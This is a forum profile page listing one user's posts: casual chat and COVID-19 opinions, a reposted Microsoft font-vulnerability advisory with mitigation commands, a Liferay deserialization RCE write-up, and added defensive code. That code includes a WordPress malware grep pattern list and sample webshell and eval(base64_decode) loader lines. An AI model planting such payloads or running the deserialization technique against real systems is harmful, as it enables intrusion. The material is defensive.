Everything posted by Nytro
-
Stay home. Skill up. #FREEapril Build in-demand tech skills without leaving your house. Get free access to 7,000+ expert-led video courses and more all month long. Due to very high demand, redemptions are processing slower than expected. Your confirmation email with login info may take a few hours. SIGN UP NOW Link: https://www.pluralsight.com/offer/2020/free-april-month
-
Restart the phones or put them in airplane mode, wait, then turn airplane mode off, both of you. Call Telekom, this shouldn't happen, but it's possible there's some stupid problem.
-
I don't see what this has to do with donations. This kind of garbage on public money has always been done. Negoita from Sector 3 wants TV/radio promotion for 1 million euro, that woman only has some company or other, but in fact another company got the contract, Sanimed, through that woman, because they had some problems... It's not normal, I don't even know if it's legal, it shouldn't be, but it doesn't surprise me either. Regarding donations, what I posted there are sources I trust 100%. Imagine that, there are also people who want to do good in this country. Hard to believe, no? If you don't want to do it, nobody is forcing you, it's just that there are also people interested in lending a hand.
-
I put up an announcement with a few links where you can donate. Trustworthy ones. If you have other suggestions, post them here or send me a PM. But they have to be trustworthy.
-
You know what this is about: http://www.cybersecuritychallenge.ro/inscriere/
-
To calculate the distance - Google Maps. Pick the starting point and right-click - "Location from here", then pick where you're going and right-click - "Location to here". It shows you the distance by car, public transport or even on foot. There are many things to visit: salt mines, mud volcanoes, Maramures, the Delta, the seaside, the mountains. You can drink spirits in Moldova and eat leeks in Oltenia. Depends what you want to do. Right now you'll probably get fined if you want to go around. So wait for the period to pass, then go wherever you want.
-
Why would you want, as a government, rich man, mason, illuminati or whatever, for people to stay at home? So you can walk naked down the street without fear of paparazzi? Actually I know the answer: so they can change the batteries in the birds! In fact there are no birds as we see them, they're robots that monitor the population.
-
Stop with this crap. You need something from Vodafone, you call the call center. You're passionate about CRMs? Guess what? There are thousands available on the net, it's not just one - Vodafone's. You can install them locally and do whatever you want with them. What you want comes with some very high risks that are probably not worth it.
-
He's right, the rest of you stop getting involved if you don't know what it's about.
- Nytro, expert in molecular biology, WHO epidemiologist and PhD candidate in virology (I also got a 5 in genetic algorithms and applications in bioinformatics at university, if that counts)
- Nytro, expert in electromagnetic wave physics, author of the 69G(Hz) standard and PhD candidate in quantum mechanics (sometimes even a listener of radio waves)
-
My opinions:
"The problem with this virus is that it stays a few hours in the throat, a simple potion made of tuica and propolis - might knock it out, same with removing the throat sting - with a plain warm tea of a little mint, honey and a little lemon; the infected could possibly be treated with injectable vitamin C." - False, same as garlic or essential oils or whatever.
"The virus is not a living organism, but a protein molecule (DNA)" - Almost true, it's RNA not DNA.
"they need humidity to remain stable and, above all, darkness" - False, I don't think it knows whether the light is on or not. Maybe they meant it is possibly sensitive to sunlight; that apparently had results in 1918, people treated outside, in the sun, did better.
Otherwise, the things posted by @Wav3 seem real and sensible.
- Nytro, expert in molecular biology, WHO epidemiologist and PhD candidate in virology (I also got a 5 in genetic algorithms and applications in bioinformatics at university, if that counts)
-
Anyone else who goes off-topic - permanent ban.
-
Type 1 Font Parsing Remote Code Execution Vulnerability
Nytro replied to Nytro's topic in Stiri securitate
This one is pretty ugly. Just saying... Save the text below as "plm.reg", double-click it, then restart:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"DisableATMFD"=dword:00000001
-
Those who take legal highs assume the risk, it's on them, it's not contagious. Same with those idiotic comparisons with "millions of people die of heart disease". Yes man, but it doesn't spread to others. Yes, there are other causes that lead to the death of many people, some of them contagious (e.g. flu, chickenpox or whatever). But either they're not that serious, or there is a specific treatment or vaccines. Here there's nothing. Laugh all you want, but you'll see in 2 weeks. I'm fairly sure many of you will have acquaintances who didn't feel well or ended up in hospitals (if they're lucky). I hope there won't be any deaths... #StatiInPulaMeaAcasa
-
Read a book. Then another. And so on. And while you read, practice the things you learn.
-
Don't count on it being just a flu. More and more cases have appeared of young people who ended up intubated. It also seems to matter whether a person is a smoker, but some people, athletes, went through hard times even though they don't smoke. It seems ibuprofen may do more harm than good. What do you do if you get sick? The treatment given in hospital isn't found in pharmacies. So when the hospitals fill up it's going to be bad. Here there's already chaos in 2-3 hospitals: Gerota, Suceava and now Floreasca. If not Universitar too. Few doctors, equipment: fuck all. So when you take Paracetamol instead of Remdesivir, Kaletra and others, don't expect the same results. In 2 weeks I really think it's going to be bad. Really bad. Edit: I see that starting tomorrow nobody leaves the house even during the day, except in those named cases. About time... I've seen many comments from retards who think this is just a joke. Or that it's a conspiracy. Technically speaking, it's like a flu. Only 10 times more deadly, 3 times more contagious and with symptoms 5 times worse. Do the math.
-
macOS, Windows 10 and Ubuntu Hacked at Pwn2Own 2020
Nytro replied to dimss's topic in Stiri securitate
Yes, they probably don't care about the money, given that they go there... I'm curious what those companies do: they have those 2-3 employees who do research and exploit development all year, probably. And how do they make a profit? That "money" is peanuts, especially since decent salaries in the US start at $150,000 a year. I understand it's OK as marketing, but I don't fully understand their business case.
-
Microsoft is aware of limited targeted attacks that could leverage un-patched vulnerabilities in the Adobe Type Manager Library, and is providing the following guidance to help reduce customer risk until the security update is released.

Two remote code execution vulnerabilities exist in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi-master font - Adobe Type 1 PostScript format. There are multiple ways an attacker could exploit the vulnerability, such as convincing a user to open a specially crafted document or viewing it in the Windows Preview pane.

Microsoft is aware of this vulnerability and working on a fix. Updates that address security vulnerabilities in Microsoft software are typically released on Update Tuesday, the second Tuesday of each month. This predictable schedule allows for partner quality assurance and IT planning, which helps maintain the Windows ecosystem as a reliable, secure choice for our customers.

The operating system versions that are affected by this vulnerability are listed below. Please see the mitigation and workarounds for guidance on how to reduce the risk.

Mitigations

For systems running supported versions of Windows 10, a successful attack could only result in code execution within an AppContainer sandbox context with limited privileges and capabilities.

Workarounds

Disable the Preview Pane and Details Pane in Windows Explorer

Disabling the Preview and Details panes in Windows Explorer prevents the automatic display of OTF fonts in Windows Explorer. While this prevents malicious files from being viewed in Windows Explorer, it does not prevent a local, authenticated user from running a specially crafted program to exploit this vulnerability.

To disable these panes in Windows Server 2008, Windows 7, Windows Server 2008 R2, Windows Server 2012, Windows Server 2012 R2, and Windows 8.1, perform the following steps:
1. Open Windows Explorer, click Organize, and then click Layout.
2. Clear both the Details pane and Preview pane menu options.
3. Click Organize, and then click Folder and search options.
4. Click the View tab.
5. Under Advanced settings, check the Always show icons, never thumbnails box.
6. Close all open instances of Windows Explorer for the change to take effect.

For Windows Server 2016, Windows 10, and Windows Server 2019, perform the following steps:
1. Open Windows Explorer, click the View tab.
2. Clear both the Details pane and Preview pane menu options.
3. Click Options, and then click Change folder and search options.
4. Click the View tab.
5. Under Advanced settings, check the Always show icons, never thumbnails box.
6. Close all open instances of Windows Explorer for the change to take effect.

Impact of workaround: Windows Explorer will not automatically display OTF fonts.

How to undo the workaround. To re-enable the Preview and Details panes in Windows Explorer for Windows Server 2008, Windows 7, Windows Server 2008 R2, Windows Server 2012, Windows Server 2012 R2, and Windows 8.1:
1. Open Windows Explorer, click Organize, and then click Layout.
2. Select both the Details pane and Preview pane menu options.
3. Click Organize, and then click Folder and search options.
4. Click the View tab.
5. Under Advanced settings, clear the Always show icons, never thumbnails box.
6. Close all open instances of Windows Explorer for the change to take effect.

For Windows Server 2016, Windows 10, and Windows Server 2019:
1. Open Windows Explorer, click the View tab.
2. Select both the Details pane and Preview pane menu options.
3. Click Options, and then click Change folder and search options.
4. Click the View tab.
5. Under Advanced settings, clear the Always show icons, never thumbnails box.
6. Close all open instances of Windows Explorer for the change to take effect.

Disable the WebClient service

Disabling the WebClient service helps protect affected systems from attempts to exploit this vulnerability by blocking the most likely remote attack vector through the Web Distributed Authoring and Versioning (WebDAV) client service. After applying this workaround it is still possible for remote attackers who successfully exploit this vulnerability to cause the system to run programs located on the targeted user's computer or the Local Area Network (LAN), but users will be prompted for confirmation before opening arbitrary programs from the Internet.

To disable the WebClient Service, perform the following steps:
1. Click Start, click Run (or press the Windows Key and R on the keyboard), type Services.msc and then click OK.
2. Right-click WebClient service and select Properties.
3. Change the Startup type to Disabled. If the service is running, click Stop.
4. Click OK and exit the management application.

Impact of workaround: When the WebClient service is disabled, Web Distributed Authoring and Versioning (WebDAV) requests are not transmitted. In addition, any services that explicitly depend on the WebClient service will not start, and an error message will be logged in the System log. For example, WebDAV shares will be inaccessible from the client computer.

How to undo the workaround. To re-enable the WebClient Service, perform the following steps:
1. Click Start, click Run (or press the Windows Key and R on the keyboard), type Services.msc and then click OK.
2. Right-click WebClient service and select Properties.
3. Change the Startup type to Automatic. If the service is not running, click Start.
4. Click OK and exit the management application.

Rename ATMFD.DLL

For 32-bit systems, enter the following commands at an administrative command prompt:
cd "%windir%\system32"
takeown.exe /f atmfd.dll
icacls.exe atmfd.dll /save atmfd.dll.acl
icacls.exe atmfd.dll /grant Administrators:(F)
rename atmfd.dll x-atmfd.dll
Restart the system.

For 64-bit systems, enter the following commands at an administrative command prompt:
cd "%windir%\system32"
takeown.exe /f atmfd.dll
icacls.exe atmfd.dll /save atmfd.dll.acl
icacls.exe atmfd.dll /grant Administrators:(F)
rename atmfd.dll x-atmfd.dll
cd "%windir%\syswow64"
takeown.exe /f atmfd.dll
icacls.exe atmfd.dll /save atmfd.dll.acl
icacls.exe atmfd.dll /grant Administrators:(F)
rename atmfd.dll x-atmfd.dll
Restart the system.

Optional procedure for Windows 8.1 operating systems and below (disable ATMFD):

Note: Using Registry Editor incorrectly can cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that problems resulting from the incorrect use of Registry Editor can be solved. Use Registry Editor at your own risk. For information about how to edit the registry, view the "Changing Keys And Values" Help topic in Registry Editor (Regedit.exe) or view the "Add and Delete Information in the Registry" and "Edit Registry Data" Help topics in Regedt32.exe.

Method 1 (manually edit the system registry):
1. Run regedit.exe as Administrator.
2. In Registry Editor, navigate to the following sub key (or create it) and set its DWORD value to 1: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\DisableATMFD, DWORD = 1
3. Close Registry Editor and restart the system.

Method 2 (use a managed deployment script):
1. Create a text file named ATMFD-disable.reg that contains the following text:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"DisableATMFD"=dword:00000001
2. Run regedit.exe.
3. In Registry Editor, click the File menu and then click Import.
4. Navigate to and select the ATMFD-disable.reg file that you created in the first step. (Note: If your file is not listed where you expect it to be, ensure that it has not been automatically given a .txt file extension, or change the dialog's file extension parameters to All Files.)
5. Click Open and then click OK to close Registry Editor.

Impact of workaround: Applications that rely on embedded font technology will not display properly. Disabling ATMFD.DLL could cause certain applications to stop working properly if they use OpenType fonts. Microsoft Windows does not release any OpenType fonts natively. However, third-party applications could install them and they could be affected by this change.

How to undo the workaround.

For 32-bit systems, enter the following commands at an administrative command prompt:
cd "%windir%\system32"
rename x-atmfd.dll atmfd.dll
icacls.exe atmfd.dll /setowner "NT SERVICE\TrustedInstaller"
icacls.exe . /restore atmfd.dll.acl
Restart the system.

For 64-bit systems, enter the following commands at an administrative command prompt:
cd "%windir%\system32"
rename x-atmfd.dll atmfd.dll
icacls.exe atmfd.dll /setowner "NT SERVICE\TrustedInstaller"
icacls.exe . /restore atmfd.dll.acl
cd "%windir%\syswow64"
rename x-atmfd.dll atmfd.dll
icacls.exe atmfd.dll /setowner "NT SERVICE\TrustedInstaller"
icacls.exe . /restore atmfd.dll.acl
Restart the system.

Optional procedure for Windows 8.1 operating systems and below (enable ATMFD):

Note: Using Registry Editor incorrectly can cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that problems resulting from the incorrect use of Registry Editor can be solved. Use Registry Editor at your own risk. For information about how to edit the registry, view the "Changing Keys And Values" Help topic in Registry Editor (Regedit.exe) or view the "Add and Delete Information in the Registry" and "Edit Registry Data" Help topics in Regedt32.exe.

Method 1 (manually edit the system registry):
1. Run regedit.exe as Administrator.
2. In Registry Editor, navigate to the following sub key and set its DWORD value to 0: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\DisableATMFD, DWORD = 0
3. Close Registry Editor and restart the system.

Method 2 (use a managed deployment script):
1. Create a text file named ATMFD-enable.reg that contains the following text:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"DisableATMFD"=dword:00000000
2. Run regedit.exe.
3. In Registry Editor, click the File menu and then click Import.
4. Navigate to and select the ATMFD-enable.reg file that you created in the first step. (Note: If your file is not listed where you expect it to be, ensure that it has not been automatically given a .txt file extension, or change the dialog's file extension parameters to All Files.)
5. Click Open and then click OK to close Registry Editor.

FAQ

Is there an update to address this vulnerability?
No, Microsoft is aware of this vulnerability and working on a fix. Updates that address security vulnerabilities in Microsoft software are typically released on Update Tuesday, the second Tuesday of each month. This predictable schedule allows for partner quality assurance and IT planning, which helps maintain the Windows ecosystem as a reliable, secure choice for our customers.

Is Microsoft aware of attacks that attempt to leverage this vulnerability?
Yes, Microsoft is aware of limited, targeted attacks that attempt to leverage this vulnerability.

How would customers receive notification about this issue and updated information from Microsoft when published?
Customers who subscribe to Microsoft Technical Security Notifications will receive a notification whenever new content is published in Microsoft's Security Update Guide. Find more information about these notifications here: Technical Security Notifications.

Do I need an ESU license to receive the update for Windows 7, Windows Server 2008 and Windows Server 2008 R2 for this vulnerability?
Yes, to receive the security update for this vulnerability for Windows 7, Windows Server 2008, or Windows Server 2008 R2 you must have an ESU license. See 4522133 for more information.

Why is this update not being released for all Windows 7 customers?
Windows 7 reached end of support on January 14, 2020. For more information on Microsoft lifecycle policies, please visit Life Cycle.

Is the Outlook Preview Pane an attack vector for this vulnerability?
No, the Outlook Preview Pane is NOT an attack vector for this vulnerability.

Is the Windows Explorer Preview Pane an attack vector for this vulnerability?
Yes, the Windows Preview Pane is an attack vector for this vulnerability.

Is Enhanced Security Configuration, which is on by default on Windows Servers, a mitigation for this vulnerability?
No, Enhanced Security Configuration does not mitigate this vulnerability.

Acknowledgements

Microsoft recognizes the efforts of those in the security community who help us protect customers through coordinated vulnerability disclosure. See acknowledgements for more information.

Source: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/adv200006
-
macOS, Windows 10 and Ubuntu Hacked at Pwn2Own 2020
Nytro replied to dimss's topic in Stiri securitate
Small sums for big achievements. But it's probably more for show-off.
-
Problema SD Card Volkswagen
Nytro replied to AndrusKanu's topic in Sisteme de operare si discutii hardware
Format it as FAT32, it should work that way. It may be NTFS and that's why it doesn't recognize it. PS: Some navigation systems may have 2 cards, one for navigation, another for media.
-
Solution to keep people at home: https://twitter.com/nixcraft/status/1241003839093784576
-
There are several possible solutions, but I don't know which is the simplest or the best.
1. You can keep only the important files (e.g. config, template and whatever), delete everything and put in a clean WordPress
2. You can diff all the existing files against a clean WordPress, there's probably a backdoor in 30 places. And see which files are new
3. You can grep for that site and see where it appears, but it's probably obfuscated. Grep for functions like "eval", "base64" or whatever
There are probably other possibilities too.
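The second and third approaches from the post above (diff the site against a clean WordPress to find new or changed files, then grep for eval/base64-style primitives) combined into one triage script. This is an added example, not code from the post; the directory layout, the "clean" and "infected" sample files and the pattern list are constructed for the demo.

```python
"""
Triage a suspected backdoored WordPress tree by (1) diffing it against a
clean install of the same version and (2) grepping for the PHP primitives
that injected code and webshells are usually built from.
Added example, not from the original post; the sample files below are
constructed for the demo.
"""
import hashlib
import os
import re
import tempfile

# Building blocks of obfuscated PHP payloads. Clean WordPress core files
# essentially never call these directly, so a hit is worth a manual look.
SUSPICIOUS = re.compile(
    rb"\b(eval|base64_decode|gzinflate|gzuncompress|str_rot13|assert)\s*\("
    rb"|preg_replace\s*\(\s*['\"].*?/e['\"]"           # deprecated /e modifier == eval
    rb"|\$_(GET|POST|REQUEST|COOKIE)\[[^\]]+\]\s*\("   # variable function from user input
)


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def manifest(root):
    """Map relative path -> sha256 for every file under root (the clean install)."""
    out = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            out[os.path.relpath(full, root)] = sha256_file(full)
    return out


def triage(site_root, clean):
    """Return sorted lists of 'new', 'modified' and 'suspicious' relative paths.
    'new'/'modified' is the diff against the clean manifest; 'suspicious' is
    the content grep and is reported independently of the diff result."""
    report = {"new": [], "modified": [], "suspicious": []}
    for rel, digest in manifest(site_root).items():
        if rel not in clean:
            report["new"].append(rel)
        elif clean[rel] != digest:
            report["modified"].append(rel)
        with open(os.path.join(site_root, rel), "rb") as f:
            if SUSPICIOUS.search(f.read()):
                report["suspicious"].append(rel)
    for key in report:
        report[key].sort()
    return report


def write_tree(root, files):
    for rel, content in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as f:
            f.write(content)


def demo():
    """Build a constructed clean install and an infected copy, then triage it."""
    clean_files = {
        "index.php": b"<?php require __DIR__ . '/wp-blog-header.php';\n",
        "wp-includes/functions.php": b"<?php function wp_demo() { return 1; }\n",
    }
    infected_files = dict(clean_files)
    # core file with an appended obfuscated loader -> modified AND suspicious
    infected_files["wp-includes/functions.php"] += b"eval(base64_decode('ZXhpdCgp'));\n"
    # dropped webshell under uploads/ calling a function named by $_POST -> new AND suspicious
    infected_files["wp-content/uploads/cache.php"] = b"<?php @$_POST['c']($_POST['a']);\n"
    # site-specific config that a clean tarball does not contain -> new, not suspicious
    infected_files["wp-config.php"] = b"<?php define('DB_NAME', 'site');\n"
    with tempfile.TemporaryDirectory() as clean_dir, tempfile.TemporaryDirectory() as site_dir:
        write_tree(clean_dir, clean_files)
        write_tree(site_dir, infected_files)
        return triage(site_dir, manifest(clean_dir))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(kind, paths)
```

Against a real site, point manifest() at an unpacked clean archive of the same WordPress version and triage() at the web root. The two signals are kept separate on purpose: wp-config.php and uploaded media are always "new" without being malicious, and a modified core file that matches none of the patterns can still carry a backdoor (for example one built from string concatenation), so "modified" files deserve a diff by hand regardless of the grep result.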
-
List: https://www.youtube.com/playlist?list=PLH15HpR5qRsXiPOP3gxN6ultoj0rAR6Yn
-
Frequently in malware investigations, we come across shellcode used after exploiting a vulnerability or being injected into a process. In this webcast, we'll look at some of the tools and techniques the malware analyst can use to start investigating what the shellcode is attempting to do. Speaker Bio Jim Clausing is a SANS instructor for SANS FOR610: Reverse-Engineering Malware: Malware Analysis Tools and Techniques with nearly 40 years of experience in the IT field including systems and database administration, security, and research in parallel processing and distributed systems. He's spent the past 20 years as a technical consultant and network security architect for AT&T doing malware analysis, forensics, incident response, intrusion detection, system hardening, and botnet tracking.
-
Liferay Portal JSON Web Service RCE Vulnerabilities

Code White has found multiple critical rated JSON deserialization vulnerabilities affecting Liferay Portal versions 6.1, 6.2, 7.0, 7.1, and 7.2. They allow unauthenticated remote code execution via the JSON web services API. Fixed Liferay Portal versions are 6.2 GA6, 7.0 GA7, 7.1 GA4, and 7.2 GA2.

The corresponding vulnerabilities are:

CST-7111: RCE via JSON deserialization (LPS-88051/LPE-165981) [1]
The JSONDeserializer of Flexjson allows the instantiation of arbitrary classes and the invocation of arbitrary setter methods.

CST-7205: Unauthenticated remote code execution via JSONWS (LPS-97029/CVE-2020-7961)
The JSONWebServiceActionParametersMap of Liferay Portal allows the instantiation of arbitrary classes and the invocation of arbitrary setter methods.

Both allow the instantiation of an arbitrary class via its parameter-less constructor and the invocation of setter methods similar to the JavaBeans convention. This allows unauthenticated remote code execution via various publicly known gadgets.

Liferay released the patched versions 6.2 GA6 (6.2.5), 7.0 GA7 (7.0.6) and 7.1 GA4 (7.1.3) to address the issues; version 7.2 GA2 (7.2.1) was already released in November 2019. For 6.1, there is only a fixpack available. [2]

Introduction

Liferay Portal is one of the, if not the, most popular portal implementations as per the Java Portlet Specification JSR-168. It provides a comprehensive JSON web service API at '/api/jsonws' with examples for three different ways of invoking a web service method:
1. Via the generic URL /api/jsonws/invoke, where the service method and its arguments get transmitted via POST, either as a JSON object or via form-based parameters (the JavaScript Example)
2. Via the service method specific URL like /api/jsonws/service-class-name/service-method-name, where the arguments are passed via form-based POST parameters (the curl Example)
3. Via the service method specific URL like /api/jsonws/service-class-name/service-method-name, where the arguments are also passed in the URL like /api/jsonws/service-class-name/service-method-name/arg1/val1/arg2/val2/… (the URL Example)

Authentication and authorization checks are implemented within the invoked service methods themselves, while the processing of the request, and thus the JSON deserialization, happens before. However, the JSON web service API can also be configured to deny unauthenticated access.

First, we will take a quick look at LPS-88051, a vulnerability/insecure feature in the JSON deserializer itself. Then we will walk through LPS-97029, which also utilizes a feature of the JSON deserializer but is a vulnerability in Liferay Portal itself.

CST-7111: Flexjson's JSONDeserializer

In Liferay Portal 6.1 and 6.2, the Flexjson library is used for serializing and deserializing data. It supports object binding that will use the setter methods of the objects instantiated for any class with a parameter-less constructor. The class is specified with the class object key:

{"class":"fully.qualified.ClassName", ... }

This vulnerability was reported in December 2018 and has been fixed in the Enterprise Edition with 6.1 EE GA3 fixpack 71 and 6.2 EE GA2 fixpack 1692, and also in 6.2 GA6.

CST-7205: Jodd's JsonParser + Liferay Portal's JSONWebServiceActionParametersMap

In Liferay Portal 7, the Flexjson library is replaced by the Jodd Json library, which does not support specifying the class to deserialize within the JSON data itself. Instead, only the type of the root object can be specified, and it has to be explicitly provided as a java.lang.Class object instance.

Looking at the call hierarchy of write accesses to the rootType field reveals the following: while most of the calls have hard-coded types specified, there is one that is variable (see the selected call on the right above). Tracing that parameterType variable backwards through the call hierarchy shows that it originates from a ClassLoader.loadClass(String) call with a parameter value originating from a JSONWebServiceActionParameters instance. That object holds the parameters passed in the web service call.

The JSONWebServiceActionParameters object has an instance of a JSONWebServiceActionParametersMap that has a _parameterTypes field for mapping parameters to types. That map is used to look up the class for deserialization during preparation of the parameters for invoking the web service method in JSONWebServiceActionImpl._prepareParameters(Class<?>). The _parameterTypes map gets filled by the JSONWebServiceActionParametersMap.put(String, Object) method:

/*     */ public Object put(String key, Object value)
/*     */ {
/*  64 */   int pos = key.indexOf(':');
/*     */
/*  66 */   if (key.startsWith("-")) {
/*     */     // [...]
/*     */   }
/*  71 */   else if (key.startsWith("+")) {
/*     */     // [...]
/*     */   }
/* 101 */   else if (pos != -1) {
/* 102 */     String typeName = key.substring(pos + 1);
/*     */
/* 104 */     key = key.substring(0, pos);
/*     */
/* 106 */     if (_parameterTypes == null) {
/* 107 */       _parameterTypes = new HashMap();
/*     */     }
/*     */
/* 110 */     _parameterTypes.put(key, typeName);
/*     */
/* 112 */     if (Validator.isNull(GetterUtil.getString(value))) {
/* 113 */       value = Void.TYPE;
/*     */     }
/*     */   }
/*     */
/*     */   // [...]
/*     */
/* 142 */   return super.put(key, value);
/*     */ }

Here lines 102 to 110 are interesting: the typeName is taken from the key string passed in. So if a request parameter name contains a ':', the part after it specifies the parameter's type, i.e.:

parameterName:fully.qualified.ClassName

This syntax is also mentioned in some of the examples in the Invoking JSON Web Services tutorial.

Later in JSONWebServiceActionImpl._prepareParameters(Class<?>), ReflectUtil.isTypeOf(Class, Class) is used to check whether the specified type extends the type of the corresponding parameter of the method to be invoked. Since there are service methods with java.lang.Object parameters, any type can be specified.

This vulnerability was reported in June 2019 and has been fixed in 6.2 GA6, 7.0 GA7, 7.1 GA4, and 7.2 GA2 by using a whitelist of allowed classes.

Demo

[1] There are two editions of the Liferay Portal: the Community Edition (CE) and the Enterprise Edition (EE). The CE is free and its source code is available at GitHub. Both editions have their own project and issue tracker at issues.liferay.com: CE has LPS-* and EE has LPE-*. LPS-88051 was created confidentially by Code White for CE and LPE-16598 was created publicly three days later for EE.
[2] Fixpacks are only available for the Enterprise Edition (EE) and not for the Community Edition (CE).

Posted by Markus Wulftange on March 20, 2020
Source: https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html
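To make the two binding behaviours concrete, here is a small Python model of them next to an allowlist fix. This is an added example, not Liferay's, Flexjson's or Jodd's code: the User/Address/Gadget classes, the class registry standing in for ClassLoader.loadClass, and the shape of the allowlist check are all assumptions made for the demo. It shows (a) the Flexjson-style "class" key in the JSON body, (b) the Liferay 7 "name:type" parameter key parsed exactly like the put() method above, with only the isTypeOf subtype check, and (c) why a java.lang.Object parameter lets that check pass for any class, whereas an explicit allowlist of deserializable types refuses the same request.

```python
"""
Model of JavaBeans-style JSON object binding with attacker-chosen target
class, in the two forms described above, plus an allowlist fix.
Added example, not Liferay/Flexjson/Jodd code; all class names and the
allowlist below are constructed for the demo.
"""
import json


# Two legitimate target types a service method might expect.
class User:
    def __init__(self):
        self.name = None

    def set_name(self, v):
        self.name = v


class Address:
    def __init__(self):
        self.city = None

    def set_city(self, v):
        self.city = v


# Stand-in for a "gadget": a no-arg-constructible class whose setter has a
# side effect. The real issues used publicly known Java gadget classes.
class Gadget:
    executed = []

    def set_command(self, v):
        Gadget.executed.append(v)   # runs during binding, before any auth check


REGISTRY = {"User": User, "Address": Address, "Gadget": Gadget}   # assumed classpath


def load_class(name):
    """Stand-in for ClassLoader.loadClass(String): resolves any name it knows."""
    if name not in REGISTRY:
        raise ValueError("no such class: " + name)
    return REGISTRY[name]


def bind(cls, fields):
    """JavaBeans-style binding: parameter-less constructor, then setXxx per key."""
    obj = cls()
    for key, value in fields.items():
        setter = getattr(obj, "set_" + key, None)
        if setter is None:
            raise AttributeError("no setter for " + key)
        setter(value)
    return obj


def flexjson_style_deserialize(text):
    """CST-7111 shape: the JSON body itself names the class to instantiate."""
    data = json.loads(text)
    return bind(load_class(data.pop("class")), data)


def parse_params(params):
    """Mirror of JSONWebServiceActionParametersMap.put: 'name:type' keys set a type."""
    values, types = {}, {}
    for key, value in params.items():
        if key.startswith(("-", "+")):
            continue                       # other key prefixes, not modelled here
        if ":" in key:
            key, type_name = key.split(":", 1)
            types[key] = type_name
        values[key] = value
    return values, types


def prepare_parameters(params, declared, allowlist=None):
    """CST-7205 shape. declared: param name -> type the service method expects.
    allowlist=None reproduces the original check (only ReflectUtil.isTypeOf);
    with an allowlist the caller-chosen type must also be in it (assumed fix shape)."""
    values, types = parse_params(params)
    out = {}
    for name, expected in declared.items():
        chosen = load_class(types[name]) if name in types else expected
        if not issubclass(chosen, expected):
            raise TypeError(f"{chosen.__name__} is not a {expected.__name__}")
        if allowlist is not None and chosen.__name__ not in allowlist:
            raise TypeError(f"{chosen.__name__} not allowed for parameter {name}")
        out[name] = bind(chosen, values[name])
    return out


def demo():
    Gadget.executed.clear()
    # (a) Flexjson-style: the body picks the class, the gadget setter runs.
    flexjson_style_deserialize('{"class": "Gadget", "command": "calc"}')
    # (b) Liferay 7 style: method parameter declared as Object, so the
    #     subtype check passes for Gadget and its setter runs.
    declared = {"payload": object}
    prepare_parameters({"payload:Gadget": {"command": "id"}}, declared)
    # (c) Same request against the allowlisted version is refused ...
    try:
        prepare_parameters({"payload:Gadget": {"command": "whoami"}}, declared,
                           allowlist={"User", "Address"})
        refused = False
    except TypeError:
        refused = True
    # ... while a legitimate typed parameter still binds.
    ok = prepare_parameters({"addr:Address": {"city": "Bucharest"}},
                            {"addr": object}, allowlist={"User", "Address"})
    return list(Gadget.executed), refused, ok["addr"].city


if __name__ == "__main__":
    print(demo())
```

The point of the model is where the trust boundary sits: in both shapes the class name and the setter values come from the unauthenticated request and are acted on before the service method's own authorization runs, so a subtype check against Object is no check at all. The fix has to constrain the set of instantiable classes, which is what the allowlist parameter does here and what the vendor's whitelist of allowed classes does in the patched versions.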